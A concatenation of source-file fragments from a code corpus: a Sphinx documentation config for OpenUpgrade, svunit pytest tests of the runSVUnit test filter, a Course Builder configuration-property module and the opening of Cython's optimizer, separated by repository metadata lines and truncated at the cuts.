# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ["sphinx.ext.autodoc"]
# Add any paths that contain templates here, relative to this directory.
templates_path = [".templates"]
# The suffix of source filenames.
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General substitutions.
project = "OpenUpgrade"
# Rename to project_copyright after the release of Sphinx 3.5
# pylint: disable=redefined-builtin
copyright = "2012-2021, Odoo Community Association (OCA) / The OpenUpgrade developers"
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = "14.0"
# The full version, including alpha/beta/rc tags.
release = "14.0"
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = "%B %d, %Y"
# List of documents that shouldn't be included in the build.
# unused_docs = []
# List of directories, relative to source directories, that shouldn't be
# searched for source files.
# exclude_dirs = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
# html_style = 'classic.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = [".static"]
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = "%b %d, %Y"
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_use_modindex = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
html_copy_source = False
# Hide the Page source link in each documentation page's footer.
html_show_sourcelink = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = "OpenUpgradedoc"
# Options for LaTeX output
# ------------------------
latex_elements = {"papersize": "a4paper"}
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class
# [howto/manual]).
latex_documents = [
(
"index",
"OpenUpgrade.tex",
"OpenUpgrade Documentation",
"The OpenUpgrade team",
"manual",
),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all m | anuals.
# latex_appendices = []
# If false | , no module index is generated.
# latex_use_modindex = True
|
svunit/svunit | test/test_run_script.py | Python | apache-2.0 | 9,783 | 0.001738 | import subprocess
import pytest
from utils import *
@all_available_simulators()
def test_filter(tmp_path, simulator):
unit_test = tmp_path.joinpath('some_unit_test.sv')
unit_test.write_text('''
module some_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVTEST(some_failing_test)
`FAIL_IF(1)
`SVTEST_END
`SVTEST(some_passing_test)
`FAIL_IF(0)
`SVTEST_END
`SVUNIT_TESTS_END
endmodule
''')
log = tmp_path.joinpath('run.log')
print('Filtering only the passing test should block the fail')
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', 'some_ut.some_passing_test'], cwd=tmp_path)
assert 'FAILED' not in log.read_text()
print('No explicit filter should cause both tests to run, hence trigger the fail')
subprocess.check_call(['runSVUnit', '-s', simulator], cwd=tmp_path)
assert 'FAILED' in log.read_text()
@all_available_simulators()
def test_filter_wildcards(tmp_path, simulator):
failing_unit_test = tmp_path.joinpath('some_failing_unit_test.sv')
failing_unit_test.write_text('''
module some_failing_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_failing_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVTEST(some_test)
`FAIL_IF(1)
`SVTEST_END
`SVUNIT_TESTS_END
endmodule
''')
passing_unit_test = tmp_path.joinpath('some_passing_unit_test.sv')
passing_unit_test.write_text('''
module some_passing_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_passing_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVTEST(some_test)
`FAIL_IF(0)
`SVTEST_END
`SVUNIT_TESTS_END
endmodule
''')
log = tmp_path.joinpath('run.log')
print('Filtering only the passing testcase should block the fail')
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', 'some_passing_ut.*'], cwd=tmp_path)
assert 'FAILED' not in log.read_text()
assert 'some_test' in log.read_text()
print('Filtering only for the test should cause both tests to run, hence trigger the fail')
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', "*.some_test"], cwd=tmp_path)
assert 'FAILED' in log.read_text()
@all_available_simulators()
def test_filter_without_dot(tmp_path, simulator):
dummy_unit_test = tmp_path.joinpath('dummy_unit_test.sv')
dummy_unit_test.write_text('''
module dummy_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_passing_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVUNIT_TESTS_END
endmodule
''')
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', 'some_string'], cwd=tmp_path)
log = tmp_path.joinpath('run.log')
assert 'fatal' in log.read_text().lower()
@all_available_simulators()
def test_filter_with_extra_dot(tmp_path, simulator):
dummy_unit_test = tmp_path.joinpath('dummy_unit_test.sv')
dummy_unit_test.write_text('''
module dummy_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_passing_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVUNIT_TESTS_END
endmodule
''')
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', 'a.b.c'], cwd=tmp_path)
log = tmp_path.joinpath('run.log')
assert 'fatal' in log.read_text().lower()
@all_available_simulators()
def test_filter_with_partial_widlcard(tmp_path, simulator):
dummy_unit_test = tmp_path.joinpath('dummy_unit_test.sv')
dummy_unit_test.write_text('''
module dummy_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_passing_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVUNIT_TESTS_END
endmodule
''')
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', 'foo*.bar'], cwd=tmp_path)
log = tmp_path.joinpath('run.log')
assert 'fatal' in log.read_text().lower()
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', 'foo.bar*'], cwd=tmp_path)
log = tmp_path.joinpath('run.log')
assert 'fatal' in log.read_text().lower()
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', '*foo.bar'], cwd=tmp_path)
log = tmp_path.joinpath('run.log')
assert 'fatal' in log.read_text().lower()
@all_available_simulators()
def test_multiple_filter_expressions(tmp_path, simulator):
unit_test = tmp_path.joinpath('some_unit_test.sv')
unit_test.write_text('''
module some_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVTEST(some_failing_test)
`FAIL_IF(1)
`SVTEST_END
`SVTEST(some_passing_test)
`FAIL_IF(0)
`SVTEST_END
`SVTEST(some_other_passing_test)
`FAIL_IF(0)
`SVTEST_END
`SVTEST(yet_another_passing_test)
`FAIL_IF(0)
`SVTEST_END
`SVUNIT_TESTS_END
endmodule
''')
log = tmp_path.joinpath('run.log')
print('Filtering only the passing testcases should | block the fail')
subprocess.check_call(
[
'runSVUnit',
'-s', simulator,
'--filter', '*.some_passing_test:*.some_other_passing_test:*.yet_another_passing_test',
| ],
cwd=tmp_path)
assert 'FAILED' not in log.read_text()
assert 'some_passing_test' in log.read_text()
assert 'some_other_passing_test' in log.read_text()
assert 'yet_another_passing_test' in log.read_text()
@all_available_simulators()
def test_negative_filter(tmp_path, simulator):
unit_test = tmp_path.joinpath('some_unit_test.sv')
unit_test.write_text('''
module some_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVTEST(some_failing_test)
`FAIL_IF(1)
`SVTEST_END
`SVTEST(some_other_failing_test)
`FAIL_IF(1)
`SVTEST_END
`SVTEST(some_passing_test)
`FAIL_IF(0)
`SVTEST_END
`SVUNIT_TESTS_END
endmodule
''')
log = tmp_path.joinpath('run.log')
print('Filtering out the failing tests should block the fail')
subprocess.check_call(
['runSVUnit',
'-s', simulator,
'--filter', '-some_ut.some_failing_test:some_ut.some_other_failing_test',
],
cwd=tmp_path)
assert 'FAILED' not in log.read_text()
assert 'some_passing_test' in log.read_text()
@all_available_simulators()
def test_positive_and_negative_filter(tmp_path, simulator):
unit_test = tmp_path.joinp |
supunkamburugamuve/mooc2 | models/config.py | Python | apache-2.0 | 8,582 | 0.000466 | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manages dynamic properties of an application and/or its modules.
An application must explicitly declare properties and provide a type, doc string
and default value for each. The default property values are overridden by
the new values found in the environment variable with the same name. Those are
further overridden by the values found in the datastore. We also try to do all
of this with performance in mind.
"""
__author__ = 'Pavel Simakov (psimakov@google.com)'
import logging
import os
import time
import appengine_config
import entities
import transforms
from google.appengine.api import namespace_manager
from google.appengine.ext import db
# The default update interval supported.
DEFAULT_UPDATE_INTERVAL = 60
# The longest update interval supported.
MAX_UPDATE_INTERVAL = 60 * 5
# Allowed property types.
TYPE_INT = int
TYPE_STR = str
TYPE_BOOL = bool
ALLOWED_TYPES = frozenset([TYPE_INT, TYPE_STR, TYPE_BOOL])
class ConfigProperty(object):
"""A property with name, type, doc_string and a default value."""
def __init__(
self, name, value_type, doc_string,
default_value=None, multiline=False):
if not value_type in ALLOWED_TYPES:
raise Exception('Bad value type: %s' % value_type)
self._multiline = multiline
self._name = name
self._type = value_type
self._doc_string = doc_string
self._default_value = value_type(default_value)
self._value = None
Registry.registered[name] = self
@property
def multiline(self):
return self._multiline
@property
def name(self):
return self._name
@property
def value_type(self):
return self._type
@property
def doc_string(self):
return self._doc_string
@property
def default_value(self):
return self._default_value
def get_environ_value(self):
"""Tries to get value from the environment variables."""
# Look for a name in lower or upper case.
name = None
if self._name.lower() in os.environ:
name = self._name.lower()
else:
if self._name.upper() in os.environ:
name = self._name.upper()
if name:
try:
return True, transforms.string_to_value(
os.environ[name], self.value_type)
except Exception: # pylint: disable-msg=broad-except
logging.error(
'Property %s failed to cast to type %s; removing.',
self._name, self._type)
del os.environ[name]
return False, None
@property
def value(self):
"""Get the latest value from datastore, environment or use default."""
# Try datastore overrides first.
overrides = Registry.get_overrides()
if overrides and self.name in overrides:
return overrides[self.name]
# Try environment variable overrides second.
has_value, environ_value = self.get_environ_value()
if has_value:
return environ_value
# Use default value last.
return self._default_value
class Registry(object):
"""Holds all registered properties."""
registered = {}
db_overrides = {}
update_interval = DEFAULT_UPDATE_INTERVAL
last_update_time = 0
update_index = 0
@classmethod
def get_overrides(cls, force_update=False):
"""Returns current property overrides, maybe cached."""
# Check if datastore property overrides are enabled at all.
has_value, environ_value = UPDATE_INTERVAL_SEC.get_environ_value()
if (has_value and environ_value == 0) or (
UPDATE_INTERVAL_SEC.default_value == 0):
return
# Check if cached values are still fresh.
now = long(time.time())
age = now - cls.last_update_time
if force_update or age < 0 or age >= cls.update_interval:
try:
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace(
appengine_config.DEFAULT_NAMESPACE_NAME)
cls.load_from_db()
finally:
namespace_manager.set_namespace(old_namespace)
except Exception as e: # pylint: disable-msg=broad-except
logging.error(
'Failed to load properties from a database: %s.', str(e))
finally:
# Avoid overload and update timestamp even if we failed.
cls.last_update_time = now
cls.update_index += 1
return cls.db_overrides
@classmethod
def load_from_db(cls):
"""Loads dynamic properties from db."""
logging.info('Reloading properties.')
overrides = {}
for item in ConfigPropertyEntity.all().fetch(1000):
name = item.key().name()
if not name in cls.registered | :
logging.error(
'Property is not registered (skipped): %s', name)
continue
target = cls.registered[name]
if target and not item.is_draft:
# Enforce value type.
try:
value = transforms.string_to_value(
item.value, target.value_type)
except Exception: # pylint: disable-msg=broad-except
logging. | error(
'Property %s failed to cast to a type %s; removing.',
target.name, target.value_type)
continue
# Don't allow disabling of update interval from a database.
if name == UPDATE_INTERVAL_SEC.name:
if value == 0 or value < 0 or value > MAX_UPDATE_INTERVAL:
logging.error(
'Bad value %s for %s; discarded.', name, value)
continue
else:
cls.update_interval = value
overrides[name] = value
cls.db_overrides = overrides
class ConfigPropertyEntity(entities.BaseEntity):
"""A class that represents a named configuration property."""
value = db.TextProperty(indexed=False)
is_draft = db.BooleanProperty(indexed=False)
def run_all_unit_tests():
"""Runs all unit tests for this modules."""
str_prop = ConfigProperty('gcb-str-prop', str, ('doc for str_prop'), 'foo')
int_prop = ConfigProperty('gcb-int-prop', int, ('doc for int_prop'), 123)
assert str_prop.default_value == 'foo'
assert str_prop.value == 'foo'
assert int_prop.default_value == 123
assert int_prop.value == 123
# Check os.environ override works.
os.environ[str_prop.name] = 'bar'
assert str_prop.value == 'bar'
del os.environ[str_prop.name]
assert str_prop.value == 'foo'
# Check os.environ override with type casting.
os.environ[int_prop.name] = '12345'
assert int_prop.value == 12345
# Check setting of value is disallowed.
try:
str_prop.value = 'foo'
raise Exception()
except AttributeError:
pass
# Check value of bad type is disregarded.
os.environ[int_prop.name] = 'foo bar'
assert int_prop.value == int_prop.default_value
UPDATE_INTERVAL_SEC = ConfigProperty(
'gcb_config_update_interval_sec', int, (
'An update interval (in seconds) for reloading runtime properties '
'from a datastore. Using this editor, y |
hhsprings/cython | Cython/Compiler/Optimize.py | Python | apache-2.0 | 186,187 | 0.003829 | from __future | __ import absolute_import
import sys
import copy
import codecs
from . import TypeSlots
from .ExprNodes import not_a_constant
import cython
cython.declare(UtilityCode=object, EncodedString=object, bytes_literal=object,
Nodes=object, ExprNodes=object, PyrexTypes=object, Builtin=object,
UtilNodes=object, _py_int_types=object)
if sys.version_info[0] >= 3:
_py_int_types = int
else:
| _py_int_types = (int, long)
from . import Nodes
from . import ExprNodes
from . import PyrexTypes
from . import Visitor
from . import Builtin
from . import UtilNodes
from . import Options
from .Code import UtilityCode, TempitaUtilityCode
from .StringEncoding import EncodedString, bytes_literal
from .Errors import error
from .ParseTreeTransforms import SkipDeclarations
try:
from __builtin__ import reduce
except ImportError:
from functools import reduce
try:
from __builtin__ import basestring
except ImportError:
basestring = str # Python 3
def load_c_utility(name):
return UtilityCode.load_cached(name, "Optimize.c")
def unwrap_coerced_node(node, coercion_nodes=(ExprNodes.CoerceToPyTypeNode, ExprNodes.CoerceFromPyTypeNode)):
if isinstance(node, coercion_nodes):
return node.arg
return node
def unwrap_node(node):
while isinstance(node, UtilNodes.ResultRefNode):
node = node.expression
return node
def is_common_value(a, b):
a = unwrap_node(a)
b = unwrap_node(b)
if isinstance(a, ExprNodes.NameNode) and isinstance(b, ExprNodes.NameNode):
return a.name == b.name
if isinstance(a, ExprNodes.AttributeNode) and isinstance(b, ExprNodes.AttributeNode):
return not a.is_py_attr and is_common_value(a.obj, b.obj) and a.attribute == b.attribute
return False
def filter_none_node(node):
if node is not None and node.constant_result is None:
return None
return node
class _YieldNodeCollector(Visitor.TreeVisitor):
"""
YieldExprNode finder for generator expressions.
"""
def __init__(self):
Visitor.TreeVisitor.__init__(self)
self.yield_stat_nodes = {}
self.yield_nodes = []
visit_Node = Visitor.TreeVisitor.visitchildren
def visit_YieldExprNode(self, node):
self.yield_nodes.append(node)
self.visitchildren(node)
def visit_ExprStatNode(self, node):
self.visitchildren(node)
if node.expr in self.yield_nodes:
self.yield_stat_nodes[node.expr] = node
# everything below these nodes is out of scope:
def visit_GeneratorExpressionNode(self, node):
pass
def visit_LambdaNode(self, node):
pass
def visit_FuncDefNode(self, node):
pass
def _find_single_yield_expression(node):
yield_statements = _find_yield_statements(node)
if len(yield_statements) != 1:
return None, None
return yield_statements[0]
def _find_yield_statements(node):
collector = _YieldNodeCollector()
collector.visitchildren(node)
try:
yield_statements = [
(yield_node.arg, collector.yield_stat_nodes[yield_node])
for yield_node in collector.yield_nodes
]
except KeyError:
# found YieldExprNode without ExprStatNode (i.e. a non-statement usage of 'yield')
yield_statements = []
return yield_statements
class IterationTransform(Visitor.EnvTransform):
"""Transform some common for-in loop patterns into efficient C loops:
- for-in-dict loop becomes a while loop calling PyDict_Next()
- for-in-enumerate is replaced by an external counter variable
- for-in-range loop becomes a plain C for loop
"""
def visit_PrimaryCmpNode(self, node):
if node.is_ptr_contains():
# for t in operand2:
# if operand1 == t:
# res = True
# break
# else:
# res = False
pos = node.pos
result_ref = UtilNodes.ResultRefNode(node)
if node.operand2.is_subscript:
base_type = node.operand2.base.type.base_type
else:
base_type = node.operand2.type.base_type
target_handle = UtilNodes.TempHandle(base_type)
target = target_handle.ref(pos)
cmp_node = ExprNodes.PrimaryCmpNode(
pos, operator=u'==', operand1=node.operand1, operand2=target)
if_body = Nodes.StatListNode(
pos,
stats = [Nodes.SingleAssignmentNode(pos, lhs=result_ref, rhs=ExprNodes.BoolNode(pos, value=1)),
Nodes.BreakStatNode(pos)])
if_node = Nodes.IfStatNode(
pos,
if_clauses=[Nodes.IfClauseNode(pos, condition=cmp_node, body=if_body)],
else_clause=None)
for_loop = UtilNodes.TempsBlockNode(
pos,
temps = [target_handle],
body = Nodes.ForInStatNode(
pos,
target=target,
iterator=ExprNodes.IteratorNode(node.operand2.pos, sequence=node.operand2),
body=if_node,
else_clause=Nodes.SingleAssignmentNode(pos, lhs=result_ref, rhs=ExprNodes.BoolNode(pos, value=0))))
for_loop = for_loop.analyse_expressions(self.current_env())
for_loop = self.visit(for_loop)
new_node = UtilNodes.TempResultFromStatNode(result_ref, for_loop)
if node.operator == 'not_in':
new_node = ExprNodes.NotNode(pos, operand=new_node)
return new_node
else:
self.visitchildren(node)
return node
def visit_ForInStatNode(self, node):
self.visitchildren(node)
return self._optimise_for_loop(node, node.iterator.sequence)
def _optimise_for_loop(self, node, iterator, reversed=False):
if iterator.type is Builtin.dict_type:
# like iterating over dict.keys()
if reversed:
# CPython raises an error here: not a sequence
return node
return self._transform_dict_iteration(
node, dict_obj=iterator, method=None, keys=True, values=False)
# C array (slice) iteration?
if iterator.type.is_ptr or iterator.type.is_array:
return self._transform_carray_iteration(node, iterator, reversed=reversed)
if iterator.type is Builtin.bytes_type:
return self._transform_bytes_iteration(node, iterator, reversed=reversed)
if iterator.type is Builtin.unicode_type:
return self._transform_unicode_iteration(node, iterator, reversed=reversed)
# the rest is based on function calls
if not isinstance(iterator, ExprNodes.SimpleCallNode):
return node
if iterator.args is None:
arg_count = iterator.arg_tuple and len(iterator.arg_tuple.args) or 0
else:
arg_count = len(iterator.args)
if arg_count and iterator.self is not None:
arg_count -= 1
function = iterator.function
# dict iteration?
if function.is_attribute and not reversed and not arg_count:
base_obj = iterator.self or function.obj
method = function.attribute
# in Py3, items() is equivalent to Py2's iteritems()
is_safe_iter = self.global_scope().context.language_level >= 3
if not is_safe_iter and method in ('keys', 'values', 'items'):
# try to reduce this to the corresponding .iter*() methods
if isinstance(base_obj, ExprNodes.CallNode):
inner_function = base_obj.function
if (inner_function.is_name and inner_function.name == 'dict'
and inner_function.entry
and inner_function.entry.is_builtin):
# e.g. dict(something).items() => safe to use .iter*()
is_safe_iter = True
keys = values = False
if method == 'iterkeys' or (is_safe_iter and method == 'keys'):
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.